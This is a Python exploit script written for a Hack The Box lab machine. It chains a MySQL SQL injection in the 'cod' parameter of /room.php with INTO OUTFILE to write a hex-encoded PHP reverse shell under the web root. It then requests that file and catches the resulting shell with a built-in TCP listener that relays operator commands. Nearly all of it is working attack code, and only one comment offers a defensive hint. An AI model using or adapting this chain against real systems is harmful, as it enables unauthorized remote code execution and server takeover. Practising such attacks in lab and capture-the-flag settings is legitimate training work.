# This code was written by Vitor Falcão <vitorfhc at protonmail.com> | |
#!/usr/bin/python3 | |
from socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR | |
from threading import Thread | |
from requests import get, exceptions | |
from string import ascii_lowercase, ascii_uppercase | |
from random import choice | |
from binascii import hexlify | |
# Run configuration.  IP and PORT are text-substituted into FILE by
# file_to_hex(), and PORT is also the port listen_conn() binds; HOST is the
# base URL every request in this script is built from.
FILE = "reverse.min.php" # file with reverse php shell
HOST = "http://10.10.10.143" # htb machine ip
IP = "10.10.15.8" # reverse shell ip
PORT = 1337 # reverse shell port
def random_string(length):
    """Return `length` ASCII letters (upper and lower case) drawn at random.

    Uses `random.choice`, i.e. the non-cryptographic PRNG; `length` of 0
    yields the empty string.
    """
    alphabet = ascii_lowercase + ascii_uppercase
    return "".join(choice(alphabet) for _ in range(length))
def file_to_hex(filename):
    """Read `filename`, patch in IP and PORT, and return it as a `0x…` hex literal.

    The patching is a plain text replace: the file must contain the exact
    strings "$ip='ip'" and "$port=1337" for the module-level IP and PORT to
    be applied; any other content is passed through unchanged.  The result
    is the UTF-8 bytes of the patched text, lower-case hex, prefixed "0x".
    """
    with open(filename) as fh:
        template = fh.read()
    patched = (
        template
        .replace("$ip='ip'", f"$ip='{IP}'")
        .replace("$port=1337", f"$port={PORT}")
    )
    return "0x" + patched.encode().hex()
def sqli():
    """Send the injected request that writes FILE's contents under the web root.

    Returns the randomly named .php file name that the query wrote, which
    execute_reverse() then requests.  The request is fire-and-forget: the
    response is not inspected, so a failed write is not detected here.
    """
    global FILE
    print("Making sql injection")
    # The injection point is the `cod` query parameter of /room.php.
    url = HOST + "/room.php?cod="
    random_name = random_string(8) + ".php"
    hex_payload = file_to_hex(FILE)
    # `INTO OUTFILE ... LINES TERMINATED BY <hex literal>` is MySQL/MariaDB
    # syntax.  Defensive note: the write only succeeds when the DB account
    # holds the FILE privilege, secure_file_priv does not restrict the target
    # path, and the DB server process can write under /var/www/html —
    # revoking FILE and setting secure_file_priv removes this write primitive.
    payload = f"1 or 1=2 limit 0,1 into outfile '/var/www/html/{random_name}' lines terminated by {hex_payload}"
    get(url + payload)
    print("Created file", random_name, "on the server")
    return random_name
def execute_reverse(path):
    """Request the file written by sqli() so the web server executes it.

    `path` is the bare file name returned by sqli(); it is requested from
    HOST's root.  The GET is given a 3 s timeout and a Timeout is swallowed
    on purpose — presumably the page does not return while the shell it
    starts is connected, so a timeout is the expected outcome, not an error.
    Any other requests exception propagates to the caller.
    """
    print("Executing reverse shell:", path)
    path = "/" + path
    url = HOST + path
    try:
        get(url, timeout=3)
    except exceptions.Timeout as e:
        pass
def listen_conn():
    """Accept one TCP connection on 0.0.0.0:PORT and relay stdin lines to it.

    Started in a thread by main().  Never returns on its own: the loop below
    has no exit condition, so it ends only when recvmsg() raises (peer went
    away) or input() hits EOF.
    """
    global PORT
    with socket(AF_INET, SOCK_STREAM) as s:
        # SO_REUSEADDR lets a quick re-run rebind PORT while the previous
        # socket is still in TIME_WAIT.
        s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        # Binds on all interfaces, not only the address in IP.
        s.bind(("0.0.0.0", PORT))
        s.listen()
        conn, addr = s.accept()
        with conn:
            print("Got connection from", addr)
            # The first read is discarded (presumably the shell's initial
            # output) — nothing checks that addr is the host that was targeted.
            data = conn.recvmsg(4096)
            while True:
                # recvmsg() returns (data, ancdata, msg_flags, address); the
                # whole tuple is printed, not the decoded payload bytes.
                data = conn.recvmsg(4096)
                print(data)
                # Sent verbatim, with no trailing newline added.
                send = input("Send: ")
                conn.sendall(send.encode())
def get_info():
    """Prompt for the listener IP, keeping the module-level IP when the answer is blank.

    A non-blank answer replaces IP exactly as typed (surrounding whitespace
    is only used to decide whether the answer is blank, not trimmed from
    the stored value).
    """
    global IP
    answer = input(f"Your IP [{IP}]: ")
    if answer.strip():
        IP = answer
def main():
    """Run the steps in order.

    Prompt for the listener IP, run sqli(), start listen_conn() in a thread,
    call execute_reverse() with the file name sqli() returned, then block
    until the listener thread finishes.
    """
    get_info()
    written_name = sqli()
    listener = Thread(target=listen_conn)
    listener.start()
    execute_reverse(written_name)
    listener.join()
if __name__ == "__main__":
    # Script entry point; importing the module defines the functions only.
    main()